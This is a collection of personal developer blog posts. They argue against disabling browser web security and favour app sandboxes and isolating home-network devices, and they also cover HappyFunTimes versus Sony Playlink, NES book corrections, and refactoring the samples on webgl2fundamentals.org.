Don’t disable web security!!!

This basic question is all over stack overflow.

People ask how can they access files when developing HTML locally. They make a .HTML file, then open it in Chrome. They add a script that needs to access an image for canvas or WebGL or whatever and find they can’t. So they ask on Stack Overflow and the most common answer is some form of “Start Chrome with the option –disasble-web-security” (or one of 5 or 6 other similar flags)

I keep screaming DON’T DO THAT! but almost no one listens. In fact not only that the downvote my answers.

Well here’s two proof of concepts of why it’s ill-advised to disable web security.

The first one is an example that will get your stack overflow or github username if you are logged in and you started chrome with --disable-web-security. Of course you probably don’t care that someone is looking up your username on various sites but that’s not really the point. The point is some webpage not related to those sites was able to access data from those sites. The same webpage could access any other site. You bank, your google account, all because you disabled security.

You might say “I’d never run a script like that” but you likely run lots of 3rdparty scripts.

The second example will show files from your hard drive. It could upload them to a remote server. Which files some baddie would want I have no idea. The point is not to show uploading dangerous files. The point is only to show if you disable web security it’s possible for a script, your own or a 3rd party one to access your local files.

Many of you will be thinking “I’d never do either of those” but I think that’s being short sighted. I know I often forget which browser I’m in, the dev one or the non-dev one. If I mistakenly used the dev one with web security disabled then oops.

Of course you might also be thinking you’d never do any of the things above. You’re running your own hand coded webpages with scripts and not using any 3rd party libraries and you never use the wrong browser. But again, that’s not the point. The point is you turned off security. The point is not to enumerate all the ways you might get hacked or have data stolen or accounts manipulated. The point is if you disable web security you’ve made yourself more vulnerable period.

This is especially frustrating because the better solution is so simple. Just run a simple local server! It will take you all of 2 minutes at most. Here’s one I wrote for those people not comfortable with the command line. Here’s also 6 or 7 others.

Sony Playlink

So Sony announced Playlink at E3 this year 2017.

It’s a little frustrating. It’s basically HappyFunTimes.

The part that’s frustrating is in that video Shuhei Yoshida is happily playing a Playlink game and yet about a year ago I saw Shuhei Yoshida at a Bitsummit 2016 party and I showed him a video of happyfuntimes. He told me using phones as a controller was a stupid idea. Is objection was that phone controls are too mushy and laggy. He didn’t have the foresight to see that not all games need precise controls to be fun. And yet here he is a year later playing Playlink which is the same thing as happyfuntimes.

In 2014 I also showed Konou Tsutomu happyfuntimes at a party and even suggested a “Playstation Party” channel with games for more than 4 players using the system. My hope was maybe he’d get excited about it and bring it up at Sony but he seemed uninterested.

Some people don’t see the similarity but I’d like to point out that there are

  • There are happyfuntimes games where you draw on the phone
  • There are happyfuntimes games where you use a virtual dpad
  • There are happyfuntimes games where you tilt and orient the phone like a Wiimote
  • There are happyfuntimes games where you set the phone on the table and spin it
  • There are happyfuntimes games where you’re given various menus of choices
  • There are happyfuntimes games that take live video from the phone and display it in the game
  • There are happyfuntimes games that use the phone like Google Cardboard, multiple people looking in shared VR
  • There are happyfuntimes games that play sounds from the phone
  • There are happyfuntimes games with asymmetric controls where
    • One player is the driver (uses phone like Wii MarioKart Wiimote)
    • One player is the navigator (map only on his phone so has to direct driver)
    • Two players are chefs making pizzas, pretending phones are boxes of ingredients

And many others.

And of course there are also games you could not easily play on PS4 like this giant game where players control bunnies or this game using 6 screens.

And to Shuhei’s objection that the controls are not precise enough

You just have to design the right games. Happyfuntimes would not be any good for Street Fighter but that doesn’t mean there aren’t still an infinite variety of games it would be good for.

In any case I’m not upset about it. I doubt that Shuhei had much to do with Playlink directly I doubt Konou even brought it up at Sony. I think the basic idea is actually a pretty obvious idea. Mostly it just reinforces something I already knew. That pitching and negotiation skills are incredibly important. If I had really wanted happyfuntimes to become PS4 Playlink I should have pitched it much harder and more officially than showing it casually at a party to gauge interest. It’s only slightly annoying to have been shot down by the same guy that announced their own version of the same thing. 😜

In any case, if you want to experiment with games that support lots of players happyfuntimes is still a free and open source project available for Unity and/or HTML5/Electron. I’d love to see and play your games!

Wishing for more Sandboxes

I’m starting to wish that nearly all desktop apps ran in a very tight sandbox the same way they do on iOS.

Windows is trying to do this with the Windows store and Apple is trying to do it with the Mac App Store. The problem is two folder. One is they started with unsandboxed systems and so have decades of legacy software that expects to be unsandboxed. The other is they’ve conflated sandboxes and their app stores. Those 2 things should be separated.

Apps like Photoshop, Lightroom, Microsoft Word, gIMP, Blender, Maya, etc should not need system wide access.

To be clear I am **NOT** suggesting that there should be an app store or there should be an approval process for apps. Rather I’m suggesting that the OS should default to running each app in a sandbox with that app unable to get outside its sandbox without user permission. The permission system should be designed well (like I think it mostly is on iOS) so a native app should not be able to access your entire hard drive by default. It should not be able to read files from other apps by default. It should not be able to use your camera or mic or get GPS info by default. It should not be able to supply notifications by default or read your contacts. All of those things should be requested of the user at use time like iOS does (and I think Android is in the process of doing).

This might seem unrelated but it came up recently when a user on Stack Overflow asked how to make an Electron app from their HTML5 WebGL game. There are a few steps but over all it’s pretty easy. If you’re not familiar with Electron it’s basically a version of Chrome that you can bundle as an app with your own HTML/CSS/JavaScript but unlike a normal webpage your JavaScript can access native features like files, OS level menus, OS level networking, etc.

And there in is the issue. The issue is it’s common to use 3rd party scripts in your HTML5 apps. Maybe you’re including JQuery or Three.js from a CDN. Maybe like many mobile apps you’re downloading your HTML/CSS/JavaScript from your own servers like myautoupdatingapp.com. By doing that you’ve just made it possible for the people controlling the CDN or that hacks your server or the people that buy your domain to own every machine that’s running your app. This is something that’s not true with a browser doing the same thing because the browser does not allow JavaScript to access all those native things. It’s only Electron that does this.

This means I have to trust every developer using Electron to not do either of those things.

On the other hand, this is exactly what iOS was designed to handle. You don’t have to trust the app to the same level because the OS doesn’t let the app read and write files to the entire machine. The OS doesn’t let the app access the camera or the mic without first asking the user for permission.

This isn’t the first time this kind of thing has happened. I’m sure there’s plenty of other cases. One for me is XBMC/Kodi where there are plugins but no sandbox which means every plugin could be hacking your system. Many of those plugins are for websites that are arguably doing questionable things so why should I trust them not to do questionable things to my machine?

I’d even take it so far as I wish it it was easier to do this in the terminal/shell. If I’m trying out a new project there is often a build step or setup step or even the project itself. Those steps often allow code to run, code I don’t want to have to trust. Of course in those cases I could run them in a VM and maybe I should start doing that more. I’m just wishing that that was easier than it is today. Like it kind if wish it was an OS level thing. I’d type something like

mkdir test & cd test & start VM

or

mkdir test & cd test & start standbox

Then I could

git clone someproject .
./configure
make

or

git clone somejsproj .
npm install

And not have to trust the 1000+ contributors above that they weren’t doing something bad intentionally or unintentionally.

Unfortunately without a push by Apple and/or Microsoft it’s unlikely the big software companies like Adobe are going to switch to their apps to the sandboxed systems.

IMO both companies need to separate their sandboxes (good) from their stores (bad). They then need to make it harder to run un-sandboxed apps. Not impossible, some apps probably need system level access if they provide system level services. But, they need to start making it the normal that the apps themselves are sandboxed.

NES/Famicom, A Visual Compendium – Corrections

I very nice book came out with images from tons of NES games called “NES/Famicom, A Visual Compendium“. I saw several of my friends had backed the kickstarter and when they go their copies they mentioned one of my games was in it so I had to buy a copy.

It’s a gorgeous book. I’m not 100% sure I’m into the sharp emulator captures graphics as they look absolutely nothing at all like the original games. As art they’re very cool but as representations of what those games looked like they are far off the mark. You can see a comparison on this article and see how when blown up in an emulator they look all blocky but back when the came out they looked smooth. Still as graphic art it’s cool to see them in the book.

That said I looked up M.C. Kids and was a little disappointed to see things reported incorrectly. I not blaming anyone in particular. I assume it’s an issue of like the game “telephone” where as the message got passed from person to person it got re-interpreted and ended up in it’s present form

For M.C Kids it implies Rene did all the enemies but that was not the case. I’m not sure the percent of enemies created by Rene but IIRC Darren Bartlett and Ron Miller both did enemies as well.

I then notice there was an unreleased section and sure enough there was Robocop vs Terminator listed.

It’s also wrong. It’s says “Graeme Devine moved me from Caesars Palace Gameboy to Robocop Vs Terminator”. What actually happened though is Graeme Devine moved me from Caesars Palace to Terminator NES, not Robocop vs Terminator. I worked on an animation tool to be shared between Terminator NES and M.C. Kids NES. Later I was asked to work on M.C Kids and Terminator was given to David Parry to make Terminator for Sega Genesis. When I finished M.C. Kids and I was no longer at Virgin Games I got a contract from Interplay to code Robocop Vs Terminator for NES.

Trying to help noobs is SOOOO FRUSTRATING!

I often wonder if I’d like to teach. It’s certainly fun to teach when the students are easy to teach ? But where’s the challenge in that?

I wrote webglfundamentals.org (and webgl2fundamentals.org) and I answer tons of WebGL questions on stackoverflow but sometimes it’s sooooooooooooooo frustrating.

I’m trying to take those frustrations as an opportunity to learn better how to teach, how to present things, how to be patient, etc but still… (more…)

After 11 years of waiting The Last Guardian has some how lost the magic

It’s been 11 years since Shadow of the Colossus shipped for PS2. I was such a fan of Ico that even though I sat directly next to the Shadow of the Colossus team at Sony Japan and all I had to is stand up and look over my cubicle’s divider to see work in progress I made my best effort to not look because I didn’t want to spoil the experience of whatever they were making.

So, now, 11 years since then the team has finally shipped their next game, skipping an entire generation of console.

And …. (more…)

Isolating Devices on a Home Network

Call me paranoid but I’d really like to be able to easily isolate devices on a home network.

As it is most people have at a best a single router running a single local area network. On that network they have 1 or more computers, 1 or more tablets, 1 or more phones. Then they might have 1 or more smart TVs, 1 or more game consoles. And finally now people are starting to add Internet of Things (IoT) devices. IP Webcams, Network connected door locks, Lights that change color from apps, etc…

The problem is every device and every program run on every phone/tablet/tv/game consoles/computer can hack all your other devices on the same network. That includes when friends visit and connect to your network.

So for example here’s a demonstration of hacking into your network through the network connected lights. There’s ransomware where your computer gets infected with a virus which encrypts all your data and then demands a ransom to un-encrypt it. The same thing is happening to smart TVs where they infect your TV, encrypt it so you can’t use it and demand money to un-encrypt it. Printers can get infected.

All of this gets easier with every app you download. You download some new app for your phone, you have no idea if, when it’s on your home network, that it’s not scanning the network for devices with known exploits to infect. Maybe it’s just hacking your router for various reasons. It could hack your DNS so when you type “mybank.com” it actually takes you to a fake site where you type in your password and then later get robbed. Conversely you have no idea what bugs are in the app itself that might let it be exploited.

One way to possibly mitigate some of these issues seems like it would be for the router to put every device on its own network. I know of no router than can do this easily. Some routers can make virtual networks but it’s a pain in the ass. Worse, you often want to be able to talk to other devices on your home network. For example you’d like to tell your chromecast to cast some video from your phone except you can’t if they’re not on the same network. You’d like to access the webcam in your baby’s room but you can’t if they’re not on same network. You’d like to print but you can’t if they’re not on the same network etc…

So, I’ve been wondering, where’s the router that fixes this issue? Let me add a device with 1 button that makes a lan for that one device. Also, let me choose what other devices and over which protocols that new device is allowed to communicate. All devices probably also need to use some kind of encryption since with low-level network access an app could still probably manage to hack things.

I get this would only be a solution for geeks. Maybe it could be more automated in some way. But in general there’s clearly no way you can expect all app makers and all device makers to be perfect. So, the only solution seems like isolating the devices from each other.

Any other solutions?

WebGL2Fundamentals.org and stuff

I recently made webgl2fundamentals.org. WebGL2 is backward compatible with WebGL1 which means anything you learn about WebGL1 is applicable to WebGL2 but there’s a few things that made it seem like it needed a new site.

The biggest were GLSL 3.00 ES which is an updated version of GLSL that’s not available in WebGL1. It adds some great features but it’s not backward compatible so it seemed like making all the samples use GLSL 3.00 es was better than leaving it as is.

Another big reason is WebGL2 has Vertex Array Object support. I had not used them much in WebGL1 because there were an optional feature. After using them though I feel like because it’s possible to make a polyfill I should have always used them from day 1. Those machines that need the polyfill are also probably machines that don’t run WebGL well in the first place. On the other hand I think people would be annoyed learning WebGL1 if they had to rely on a polyfill so as it is I’ll leave the WebGL1 site not using Vertex Array Objects.

The second biggest reason is I got my math backward. Matrix multiplication is order dependent. A * B != B * A I’ve used various 3d math libraries in the past and I personally never noticed a convention. I’d just try A * B * C * D and if I didn’t get the result I wanted I’d switch to D * C * B * A. So, when I made the math library for WebGL1 I picked a convention based off matrix names. It’s common to have names like viewProjection and worldViewProjection so it seemed like it would be easier to understand if

viewProjection = view * projection

and

worldViewProjection = world * view * projection

But, I’ve been convinced I was wrong. It’s actually

viewProjection = projection * view

and

worldViewProjection = projection * view * world

I won’t go into the details why but I switched all the math on webgl2fundamentals.org to use the second style.

Anyway, that’s beside the point. The bigger issue is the pain of updating it all. There are currently over 132 samples. If I decide that all samples need to switch their math that’s several days of work. Even if I decide something small like all samples should clear the screen or all samples should set the viewport it takes hours visit each and every one and update. Some have patterns I can search and replace for but they’re often multi-line and a pain to regex. I wonder if there is some magic by which I could go edit git history to make each change back when I made the first sample and then see that get propagated up through all the samples. Sadly I don’t think git knows which samples were based off others and even if it did I’m sure it would be even more confusing figuring out where it couldn’t merge.

I’d hard to get everything right the first time, at least for me, and so as I create more and more samples and get more and more feedback I see places where I should probably have done something different right from the start.

For example my original goal in writing the first sample was to be as simple as possible. There’s about 20 lines of boilerplate needed for any WebGL program. I originally left those out because it seemed like clutter. Who cares how a shader is compiled, all that matters is it’s compiled and we can use it. But people complained. That’s fine. I updated the sample to put those 20 lines in but removed them in the 2nd sample.

Another issue was I didn’t use namespaces so there are functions like createProgramFromScripts instead of webglUtils.createProgramFromScripts. I’m guessing being global people were like “where is this from?”. I switched them. I’m hoping the prefixes make it clear and they’ll see the webgl-utils.js script tag at the top.

Similarly the first sample just makes 1 draw call on a fixed size 400×300 canvas. Again, to keep it as simple as possible a ton of stuff is kind of left out. For example setting uniforms once during initialization. If you’re only going to draw once that seems natural but drawing only once is a huge exception so it ends up making the sample not representative of real WebGL code. Similarly because the canvas was a fixed size there no reason to set the viewport. But 99% of WebGL apps have a canvas that changes size so they need to set the viewport. Similarly because they resize they need to update the resolution of the canvas but I had left both of those steps out. Yet another was using only one shader program. A normal WebGL app will have several shader programs and therefore set which shader programs to use at render time but the samples were setting it at init time since there was only 1. The same for attributes, textures, global render states, etc.. All of these things are normally set at render time but most of the samples were setting them at init time.

Anyway, I updated almost all of that on webgl2fundamentals.org. Now I’m trying to decide how much time to spend backporting to the old site given it took easily 40-60 hours of work to make all the changes.

I recently added a code editor to the site so people can view the code easily. That’s another one of those things where I guess having written JS related stuff for the last 8 years I know some of the tools. I know you can pick “view-source” and/or you can open the devtools in any browser and see all the code. I also know you can go to github which is linked on every page and see the source. That said I got several comments from people who got lost and didn’t know how to do any of those. Should I put a link under every single sample “click here to learn how to view source” that leads to tutorials on view source, devtools, and github? How to get a copy locally. How to run a simple web server in a few seconds to run the tutorials locally. I suppose I should write another article on all that stuff.

Well, I added the code editor for now which I’m a tiny bit proud of. At least in chrome and firefox it seems to catch both JavaScript errors and WebGL errors and will put your cursor at the correct line in your source. It also displays the console messages. I got that inspiration from Stack Overflow’s snippet editor but theirs gives the wrong line numbers. Unfortunately it’s a pretty heavy editor but it does do intellisense like help. Hopefully it will be updated to handle JSDocs soon like it’s big brother.

But, that brought up new issues which I’m not sure I should handle or not. The original samples had a fixed size. With the code editor though the size can change. I updated all the samples to handle that but it’s not perfect. Most real WebGL apps handle this case. Should I clutter the code in all the samples to handle it? All the animated samples handle it but non animated samples don’t. Some of those samples it would basically just be one line

window.addEventListener('resize', drawScene);

But of course it’s not that simple. Many samples are only designed to draw once period and would have to be re-written to even have a drawScene function.

I’m not sure what my point was in writing this except to say that it’s a new experience. Normally I work on 1 program for N months. If I decide I need to refactor it I refactor it. But for these tutorials I’m effectively working on 132+ tiny programs. If I decide I need to refactor I have to refactor all 132+ of them and all the articles that reference them.